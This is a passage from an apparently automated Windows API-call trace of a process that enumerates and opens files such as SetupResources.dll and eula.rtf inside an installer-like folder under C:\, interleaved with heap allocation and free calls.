dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0061.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0061.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.202] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0061.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0061.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0061.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0061.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0061.203] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.203] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0061.203] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0061.203] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.203] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0061.203] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0061.203] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.203] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.203] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.203] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.203] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0061.203] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0061.203] AreFileApisANSI () returned 1 [0061.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1043\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1043\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0061.203] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0061.203] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.203] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.203] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0061.203] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0061.203] AreFileApisANSI () returned 1 [0061.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.203] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0061.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 46 [0061.203] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.204] GetFileType (hFile=0x41c) returned 0x1 [0061.204] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.204] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.204] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.205] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.205] CloseHandle (hObject=0x41c) returned 1 [0061.205] AreFileApisANSI () returned 1 [0061.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b00 [0061.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 46 [0061.205] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.205] GetFileType (hFile=0x41c) returned 0x1 [0061.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0061.205] CloseHandle (hObject=0x41c) returned 1 [0061.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.206] AreFileApisANSI () returned 1 [0061.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0061.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 46 [0061.206] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58)) returned 1 [0061.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0061.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0061.206] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.206] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.206] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x46280, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䭘")) returned 0 [0061.207] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0061.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0061.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0061.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0061.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0061.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0061.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0061.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0061.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0061.207] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.207] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.207] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.207] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.207] AreFileApisANSI () returned 1 [0061.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1044", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1044", lpUsedDefaultChar=0x0) returned 27 [0061.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.207] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.207] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0061.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0061.208] AreFileApisANSI () returned 1 [0061.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0061.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044") returned 27 [0061.208] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044" (normalized: "c:\\588bce7c90097ed212\\1044"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.208] GetLastError () returned 0x5 [0061.208] GetLastError () returned 0x5 [0061.208] SetLastError (dwErrCode=0x5) [0061.208] GetLastError () returned 0x5 [0061.208] SetLastError (dwErrCode=0x5) [0061.208] GetLastError () returned 0x5 [0061.208] SetLastError (dwErrCode=0x5) [0061.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0061.208] AreFileApisANSI () returned 1 [0061.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0061.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044") returned 27 [0061.208] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044" (normalized: "c:\\588bce7c90097ed212\\1044"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.208] GetLastError () returned 0x5 [0061.208] GetLastError () returned 0x5 [0061.208] SetLastError (dwErrCode=0x5) [0061.209] GetLastError () returned 0x5 [0061.209] SetLastError (dwErrCode=0x5) [0061.209] GetLastError () returned 0x5 [0061.209] SetLastError (dwErrCode=0x5) [0061.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0061.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0061.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0061.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.209] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.209] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.209] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.209] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0061.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0061.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.209] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="1045", cAlternateFileName="")) returned 1 [0061.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0061.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0061.209] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0061.210] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.210] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbe6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0061.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0061.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0061.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46588 [0061.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0061.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0061.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 